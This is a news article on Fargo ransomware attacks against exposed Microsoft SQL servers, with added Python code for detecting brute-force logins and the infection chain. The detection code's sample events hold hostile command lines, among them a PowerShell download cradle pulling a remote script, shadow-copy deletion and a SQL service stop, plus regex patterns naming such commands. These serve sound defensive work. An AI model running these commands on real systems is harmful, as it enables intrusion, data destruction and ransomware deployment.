
Cybersecurity experts warn that attackers are targeting internet-exposed Microsoft SQL servers in a new wave of Fargo ransomware attacks.

BleepingComputer reported a similar campaign against Microsoft SQL servers in February, and another in July; both deployed Cobalt Strike.

Microsoft SQL Server is one of the most widely used database management systems, storing the sensitive data behind many internet-facing applications and services, from single-server deployments to large-scale systems.

Compromising a SQL server can lead to serious incidents even when data theft is not the goal: earlier attacks hijacked servers merely to steal bandwidth for proxy services. The new wave is more direct, an extortion scheme that blackmails and threatens database owners.

Fargo ransomware

Database servers are compromised by brute-forcing weak credentials, and unpatched vulnerabilities increase the odds of a successful break-in. Once inside, the attackers encrypt data and threaten to publish stolen files unless the victim pays the ransom.
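The brute-force stage described above leaves a clear trail in the SQL Server ERRORLOG, which records every failed login (event 18456) with the client address. The following is an added example, not code from the article or from ASEC: it parses constructed ERRORLOG lines, flags any client that exceeds a failure threshold inside a sliding window, and records whether that client subsequently logged in successfully, which is the signal that a weak credential has fallen. It assumes the default "Failed logins only" auditing for the failure lines and that auditing has been raised to "Both failed and successful logins" for the success line; the log lines, addresses and user names are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lines in SQL Server ERRORLOG format (made up for this example).
# Failed logins are written by default; the "Login succeeded" line only appears
# when login auditing is set to "Both failed and successful logins".
SAMPLE_ERRORLOG = """\
2022-09-20 10:15:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2022-09-20 10:15:01.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2022-09-20 10:15:01.58 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.45]
2022-09-20 10:15:01.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2022-09-20 10:15:02.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2022-09-20 10:15:02.20 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2022-09-20 10:15:04.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.45]
2022-09-20 10:31:12.90 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2022-09-20 12:45:00.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

# Timestamp, outcome, login name and client address of a Logon line.
LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']*)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_events(text):
    """Yield (timestamp, outcome, user, client) for each Logon line; skip everything else."""
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["outcome"], m["user"], m["client"]


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold failed logins inside a sliding window.

    Returns {client: {"first_failure", "attempts", "users", "success_after"}}.
    "success_after" holds the login name of the first successful login from a
    flagged client, i.e. the credential that was probably guessed correctly.
    """
    recent = defaultdict(list)  # client -> [(ts, user)] failures still inside the window
    alerts = {}
    for ts, outcome, user, client in parse_logon_events(text):
        if outcome == "failed":
            # Drop failures that have aged out of the window, then add this one.
            recent[client] = [(t, u) for t, u in recent[client] if ts - t <= window]
            recent[client].append((ts, user))
            if client in alerts:
                alerts[client]["attempts"] += 1
                alerts[client]["users"].add(user)
            elif len(recent[client]) >= threshold:
                alerts[client] = {
                    "first_failure": recent[client][0][0],
                    "attempts": len(recent[client]),
                    "users": {u for _, u in recent[client]},
                    "success_after": None,
                }
        elif client in alerts and alerts[client]["success_after"] is None:
            # A success from an already-flagged client: treat as probable compromise.
            alerts[client]["success_after"] = user
    return alerts


if __name__ == "__main__":
    for client, info in detect_bruteforce(SAMPLE_ERRORLOG).items():
        print(client, info)
```

The two isolated failures from 10.0.0.7 fall outside the window and stay silent, while 203.0.113.45 is flagged on its fifth failure and marked as a probable compromise when 'sa' logs in two seconds later. In production the same logic would read the live ERRORLOG (or the equivalent Windows Security/Application events) and feed a SIEM alert.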

According to researchers at ASEC, Fargo is among the most prominent ransomware families used against Microsoft SQL servers. The family is also known as Mallox, after the .mallox extension it often appends to encrypted files.

Attack process

Fargo is file-encrypting malware. The infection begins in the Microsoft SQL Server process (sqlservr.exe), which spawns cmd.exe and powershell.exe to download a .NET payload. That payload retrieves additional malware and then generates and runs a BAT file that terminates services and processes.

The ransomware then injects itself into the legitimate Windows .NET process AppLaunch.exe and attempts to delete the registry key used by a ransomware vaccine. It also runs commands that disable recovery and terminates database-related processes so that their files can be encrypted. To keep the system from becoming completely unusable, it skips critical directories holding boot files, browsers and user customizations.
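Each step of the chain above produces a process-creation event that an EDR or Sysmon can record, and the parent/child relationships are what make it detectable. The following is an added example, not code from the article or from ASEC: it runs a small set of detection rules over constructed events in the shape of Sysmon Event ID 1 (sqlservr.exe spawning a shell, a download cradle in the shell command line, AppLaunch.exe started from a user-writable path, recovery tampering such as shadow-copy deletion, and database service kills). The events, paths, URL and the specific recovery-tampering and service-kill commands are illustrative assumptions; the article names the categories, not the exact commands.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events using Sysmon Event ID 1 field names.
# The events, paths and URL are made up for this example.
SAMPLE_EVENTS = [
    {"UtcTime": "2022-09-20 10:15:06.101", "User": r"NT SERVICE\MSSQLSERVER",
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.9/a.ps1')\""},
    {"UtcTime": "2022-09-20 10:15:09.420", "User": r"NT SERVICE\MSSQLSERVER",
     "ParentImage": r"C:\Users\Public\loader.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe",
     "CommandLine": "AppLaunch.exe"},
    {"UtcTime": "2022-09-20 10:15:11.003", "User": r"NT SERVICE\MSSQLSERVER",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"UtcTime": "2022-09-20 10:15:11.250", "User": r"NT SERVICE\MSSQLSERVER",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net stop MSSQLSERVER /y"},
    # Benign activity that must not be flagged: an admin querying a service,
    # and the SQL Server service itself being started by the service manager.
    {"UtcTime": "2022-09-20 09:02:00.000", "User": r"CORP\dba",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service MSSQLSERVER"},
    {"UtcTime": "2022-09-20 08:00:00.000", "User": r"NT AUTHORITY\SYSTEM",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "CommandLine": '"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe" -sMSSQLSERVER'},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Common download cradles and recovery/service tampering commands (illustrative set).
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin|certutil.*urlcache")
RECOVERY_TAMPER = re.compile(r"(?i)vssadmin.*delete\s+shadows|wmic.*shadowcopy.*delete|bcdedit.*recoveryenabled|wbadmin.*delete")
DB_SERVICE_KILL = re.compile(r"(?i)\b(net\s+stop|sc\s+stop|taskkill)\b.*(sqlservr|mssql|sqlagent|sqlwriter)")


def basename(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return PureWindowsPath(path).name.lower()


def rule_sql_spawns_shell(e):
    # The database engine has no business launching a shell; this is the xp_cmdshell-style foothold.
    return basename(e["ParentImage"]) == "sqlservr.exe" and basename(e["Image"]) in SHELLS


def rule_shell_download_cradle(e):
    return basename(e["Image"]) in SHELLS and bool(DOWNLOAD_CRADLE.search(e["CommandLine"]))


def rule_applaunch_untrusted_parent(e):
    # Heuristic: AppLaunch.exe is a .NET host normally started from Windows or Program Files;
    # a parent in a user-writable location matches the injection-host pattern described above.
    return basename(e["Image"]) == "applaunch.exe" and not e["ParentImage"].lower().startswith(TRUSTED_PARENT_DIRS)


def rule_recovery_tampering(e):
    return bool(RECOVERY_TAMPER.search(e["CommandLine"]))


def rule_db_service_kill(e):
    return bool(DB_SERVICE_KILL.search(e["CommandLine"]))


RULES = [rule_sql_spawns_shell, rule_shell_download_cradle, rule_applaunch_untrusted_parent,
         rule_recovery_tampering, rule_db_service_kill]


def detect(events):
    """Return one alert dict per (event, matching rule) pair."""
    alerts = []
    for e in events:
        for rule in RULES:
            if rule(e):
                alerts.append({"rule": rule.__name__[len("rule_"):], "time": e["UtcTime"],
                               "image": basename(e["Image"]), "parent": basename(e["ParentImage"])})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

On the sample data the four malicious events produce five alerts (the first event trips both the parent/child rule and the download-cradle rule) and the two benign events produce none. The first rule is the one worth prioritising: a shell child of sqlservr.exe is rare enough in most environments to alert on unconditionally, and it fires before any encryption happens.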

Finally, the ransomware renames the encrypted files with a '.Fargo3' extension and drops a ransom note named 'RECOVERYFILES.txt'. The researchers recommend strong, unique credentials, keeping systems up to date and promptly applying security patches.
